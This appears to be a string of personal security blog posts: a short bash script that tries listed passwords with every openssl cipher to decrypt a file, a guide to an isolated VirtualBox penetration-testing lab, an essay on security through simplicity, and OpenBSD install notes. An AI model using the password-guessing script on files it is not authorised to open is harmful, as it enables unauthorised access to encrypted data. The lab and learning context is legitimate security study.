PASSWORD_LIST=(passwd password test)
OUTPUT_DIRECTORY="/root/1_100/decrypt_output/"
ENCRYPTED_FILE="/root/1_100/encrypted_file.csv.enc"

echo "Num algorithms=${#SUPPORTED_ALGS[*]}"
echo "Num passwords=${#PASSWORD_LIST[*]}"

for password in ${PASSWORD_LIST[*]}
do
    for alg in ${SUPPORTED_ALGS[*]}
    do
        OUTFILE="${OUTPUT_DIRECTORY}${password}_${alg}.txt"

        openssl enc -d -in $ENCRYPTED_FILE -pass pass:${password} -out $OUTFILE -${alg}
    done
done

echo "Candidate files:"
file ${OUTPUT_DIRECTORY}* | grep ASCII

exit

So, I got my hands on a handy, used Dell Latitude 620 with 2GB ram for next-to-nothing.

I’m looking for something to do with it…

How about, set up a penetration testing platform complete with: safe, internal-only networking; hosts as attackers; hosts as targets; and do the whole thing for $0.00. And, how about doing the entire thing on a single piece of hardware? Sweet.

Purpose
The purpose of this exercise is to establish a safe environment to perform penetration testing on different target hosts and applications.

A single computer with host-only networking will be used to avoid sending attacks across the network where other hosts may reside.

Goals

• Establish the lab with no additional hardware or software investment.
• Ensure that the box does not leak attacks over the network.
• Provide an easy-to-maintain platform where new attackers and targets can be added or modified over time.

Basics: Establishing the virtual environment

The lab-in-a-box comprises a used Dell Latitude D620 with 2 GB ram, and 80GB hard disk space. Not a bleeding edge host, but more than adequate for this endeavor.

Software used:

• Host OS – Ubuntu Linux 9.04, Jaunty Jackalope
• Virtualization – Sun VirtualBox
• Attacker – BackTrack 4 pre-release
• Target – De-ICE Lab CD 1

Step 1. Download and install the Host OS

Download and install Ubuntu on the host. Get it up-and-running, patched, and configured to your tastes.

Step 2. Download and install VirtualBox

Virtual box can be downloaded from: http://www.virtualbox.org/

I’m using Ubuntu, there are a few kernel modules you may need depending on the version of Ubuntu  you are working with.  If you are using a different OS, do a little research.  The VirtualBox site has pretty good info on installing.

Step 3. Download the BackTrack and De-ICE ISO images

BackTrack can be found at Remote Exploit.
The De-ICE images can be found at De-ICE.net.

Step 4. Create the hosts in VirtualBox

Follow the installation instructions on the BackTrack site.

The De-ICE image is a bootable image, so you don’t need to create a big hard disk for this. I created a simple 1GB disk for it, and have the VM configured to mount the De-ICE ISO on boot. Pretty simple.

Step 5. Set up host networking

When I set up the VM’s, they had bridged networking. This means that each VM connects to the local network through the host computer. It is as though they are separate hosts on the network, and each receives an IP address via DHCP if so configured.

The problem is that two virtual machines on the same host will still communicate with one another over the LAN – and that could mean trouble.

The image below shows, in the upper-left hand corner, my BT4 VM doing an Nmap scan of my De-ICE VM in the upper right-hand corner. The window at the bottom is my host (physical box) doing a tcpdump.

As you can see from the host tcpump, the network traffic from BT4 is traveling across the net. That’s a big problem in fat-finger space.

I don’t want to be in the coffee shop and inadvertently fat finger a target and end up in the joint.

The solution, set the virtual machines to use a local-only network. In VirtualBox, this is called “Internal Networking.”

VirtualBox supports two types of local only networking. One is called “Host Only.” With this configuration, the host can still interface with the VMs, but the VMs cannot communicate off the host. This is pretty good. But I’m going for maximal safety. That is where “Internal Only” comes in. In this configuration, the virtual machines are assigned to a named network that is created by VirtualBox. Hosts on that virtual network can communicate with other VMs on that network, but not with hosts outside that network. Even your physical box (host) cannot communicate with the VMs…

Shut down and set both the network interfaces on the BT4 and De-ICE VMs to Internal Networking as shown in the screen shot below.

Note the default internal network name (in the screen shot it is “intnet”) as you will need this when configuring the VirtualBox DHCP server…

Next, we will set up the DHCP Server for the internal network. You may not need to do this step, but I’m following the instructions for the De-ICE CD which specifies that the DHCP server should be on 192.168.1.1 and have a lower DHCP lease range of 192.168.1.2. I set the upper range at 2.254 to accommodate other De-ICE CDs.

Using a terminal on the host, run the following command (all on one line):

VBoxManage dhcpserver add --netname intnet --ip 192.168.1.1 --netmask 255.255.0.0 --lowerip 192.168.1.2 --upperip 192.168.2.254 --enable

Sweet. All is well and good. Boot up the two images.

I performed two tests to make sure there was no data leakage.

First, I ran a similar test as I had above – running tcpdump on the host while running Nmap from the BT4 VM targeting the De-ICE VM.

Second, I disabled the host’s network connection and performed the same test.

In both cases the two VMs could talk to one another, but no data leakage, as shown in the screen shot below.

Step 6. Have fun!

You are good-to-go. Fire up those virtual machines and have some fun!

Over the past semester, I have had the opportunity to assist a co-worker who was taking an “Introduction to C++” class.

I was a C++ tutor in my undergraduate program, and I helped a lot of my fellows in the Master’s Degree program I was in at JMU. Though I’m no expert, and haven’t done any C++ since graduation, I have probably written close to 25,000 lines of C++, and was excited to get involved.

My coworker was taking the class in the context of an IT Management class that has a focus on security and disaster recovery.

After she submitted her last project, she sent me an email talking about how tough the class was for her.

Below was my reply. I felt it worth capturing in a blog post…

…
Also, don’t worry if you didn’t leave this class as the world’s best developer.

I think the real take-away is that coding is hard. It’s really, really hard.

It’s easy to make mistakes, very easy.

And it’s easy to hack something together, just enough to get the project done. It happens ALL the time. With the simple tools at our disposal, even novice developers can develop huge, web enabled, and EXTREMELY BUGGY software.

And from a security perspective, you must remember that fact ALL the time. That is the big learning lesson!

Not only will the software you buy have bugs.
But so will your firewalls, your anti-virus, you name it.

Coding is hard. It is F’ING hard.

And even worse, you can take two completely secure pieces of code, and put them together. And you know what, the result may have security bugs!!!

Remember your experiences in this class. Use that experience to govern your thinking in future security related projects.

The experiences you have had are why my number one motto is: “Security through simplicity.”

It’s my opinion that every piece of hardware or software increases risk through it’s very nature.

Even a security countermeasure has some implicit security risk that must be assumed.

On the business side, when implementing software, or installing a new piece of hardware you make a business case. Does the hardware or software save money, or allow sufficient increase in revenue to justify the cost.

From the security perspective, particularly with security countermeasures, that equation is a little different. The “cost” is measured in risk.

So the consideration must be: Does the amount of risk offset by the countermeasure, adjusted for the inherent risk associated with the countermeasure itself, reduce the overall risk sufficiently to justify the use of the countermeasure.

It’s a tough equation, given that it can be tough to calculate the risk inherent in a security countermeasure.  Why?  Because we want to think that security systems are secure.  But we know the truth.  We know how deep the rabbit hole goes.

For example, what’s the risk profile of a firewall?

Well, there’s a lot. Among them:

• Potential for flaws in firewall hardware and software that could allow unacceptable traffic through.
• Potential for human error in configuring rule sets.
• Potential for the firewall to fail in an unsafe mode.

And there are plenty of associated costs.

• Cost of the system.
• Cost of maintenance.
• Cost of developing security processes and procedures to manage the firewall.
• Cost of developing and maintaining trained staff to manage the firewall.
• Cost to accurately monitor the system.

The logic is cyclical.  The more risk you offset, the more you assume.

Hence my motto:

Security through simplicity.

Bill

Installing applications

Out of the box, there’s no nifty graphical package installer in OpenBSD.

Installation can be performed by two methods:
1) The traditional method of building from source and installing
2) Downloading and installing pre-build binaries from CD or over the Web

For my experimenting, I’ll be installing binaries.

Though the absence of a package manager may seem a bit burdensome, the reality is that OpenBSD, IMHO, is best suited for a server environment where the number of installed packages should be quite small.

The bare-bones install of OpenBSD is very thin, requiring little more than is needed to get the host to boot a kernel.

From a security perspective, this is a bonus. Smaller install set = smaller attack surface.

The other thing I like is that it’s pretty easy to script the installation of packages, greatly simplifying the process of creating standard builds for web servers, database servers, etc.

Purchasing copies of the CD’s help to support the project, and packages can be installed directly from CD.

I don’t have the CD’s, so I’ll be installing from the Web.

The overall process is pretty straight forward:
1) Select an FTP mirror
2) Identify the package(s) to install
3) Use the pkg_add command to install

From scratch, here’ the process for installing the latest pre-built nmap package:

# ftp -4 -V ftp://ftp.openbsd.org/pub/OpenBSD /4.3/packages/i386/index.txt
100% |**************************************************| 105 KB 00:01
# grep nmap index.txt
nmap-4.53.tgz
nmap-zenmap-4.53.tgz
# pkg_add ftp://ftp.openbsd.org/pub/OpenBSD /4.3/packages/i386/nmap-4.53.tgz
lua-5.1.2p1: complete
libdnet-1.10p2: complete
nmap-4.53: complete
# nmap -p80 localhost

Starting Nmap 4.53 ( http://insecure.org ) at 2008-05-20 04:18 EDT
Interesting ports on bsdvm.localdomain (127.0.0.1):
PORT STATE SERVICE
80/tcp closed http

Nmap done: 1 IP address (1 host up) scanned in 0.334 seconds
#

For some reason, I was having trouble connecting to FTP servers… I kept getting the following error:
435 Can’t build data connection: illegal port number

I suspect the reason is the network I’m on, but who knows.

I also found that many of the mirrors didn’t have the latest 4.3 builds, which may not be too suprising as 4.3 was released only a few weeks ago.

Identifying what is installed

Ok, so now I know how to install, how do I tell what’s on my box?

The pkg_info command will list all packages installed on the host.

For example:

# pkg_info
atk-1.20.0p0 accessibility toolkit used by gtk+
cairo-1.4.14 vector graphics library
desktop-file-utils-0.14p1 utilities for 'desktop' entries
...


For further information on a package, you can:

# pkg_info <pkg name>

This will give detailed information about a package, including it’s full version (if it can be determined) and any dependencies…

For example:

# pkg_info tiff
Information for inst:tiff-3.8.2p0

Comment:
tools and library routines for working with TIFF images

Required by:
gtk+2-2.12.7

Description:
This software provides support for the Tag Image File Format (TIFF), a widely used format for storing image data.


...

Maintainer: The OpenBSD ports mailing-list <ports@openbsd.org>

The documentation is quite extensive, and I recommend reading the FAQ and the MAN pages.

I certainly haven’t made it through all the documentation yet :)

Next time, getting Apache, PHP, and MySQL running…

Bill

I’ve heard that getting OpenBSD installed and running can be intense.

I reserve judgment until I am able to actually try the installation a few times on bare metal.

For now, I want to set this puppy up in a virtual machine.

Here’s my rig:

• HP Pavilion DV5224nr Laptop with AMD Turion 64 Mobile, 2 GHz processor with 1 GB Ram.
• Microsoft Windows XP (32bit) Professional, fully patched.
• VMWare Server 1.0.5 build 80187

Ok, so I’m ready to go.

Doing some quick Googling, I came across a very good, short OpenBSD on VMWare how-to by Jan Exß.

I downloaded the latest OpenBSD (4.3) installer ISO from one of the many mirrors. There were many iso images, the file I nabbed was openbsd-install43.iso.

Then I got down to work using Jan’s recommended settings.

I followed the instructions pretty much 100% with a few exceptions. Notably, I didn’t install all the packages he described on the Installation page. I also set up the NIC a little differently.

I wanted the install to be relatively thin, and I also wanted to reserve some packages out so that I can get experience with installing them later, when the excitement wears off.

In the end, I completed all the tasks up to the top of the Applications page.

Reboot, and presto! OpenBSD 4.3.

Sweet.

I banged around in the terminal a bit, just enough to realize that things weren’t as different as I thought they’d be.

I know the machine isn’t doing much at the moment, but I’m surprised how fast it responds considering it’s only allocated 512 MB ram, and is running in a VM…

Current impression: Sweet! This hasn’t been as challenging as I though it would be.  Let’s see how things go from here.

Stay tuned for the next episode - Installing Applications…

For years I’ve heard about the mythical, OpenBSD.

While getting my Master’s Degree in Information Security, one of my professors remarked, “Out of the box, OpenBSD is widely considered to be the most secure operating system.”

The home page of the OpenBSD site clearly, and proudly claims: “ Only two remote holes in the default install, in more than 10 years!”

Sounds impressive. Secunia shows that of the 189 advisories it reported from 2003 to 2008 for Microsoft Windows XP Professional, 61% were remote exploits.

Sixty-one percent! That’s 115 in just over 4 years!

The skeptic in me says, well, how many OpenBSD installs are there, relative to the number of XP installs. The bigger the install base, the more attractive the target.

But still. The seed had been planted.

I needed to try this thing out for myself!

I’ve toyed around with Linux since the late 90’s, but hadn’t used a Unix system since before that.

I have been stuck in Microsoft shops since ‘99 :/

But the power of virtualization has now made it possible for me to kick the tires of this mythical beast, and see how it responds.

In my next post, getting up-and-running with OpenBSD and VMWare Server.

For those who can’t wait, here’s my browser’s User Agent:
Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.12) Gecko/20080310 Firefox/2.0.0.12
So, it works :)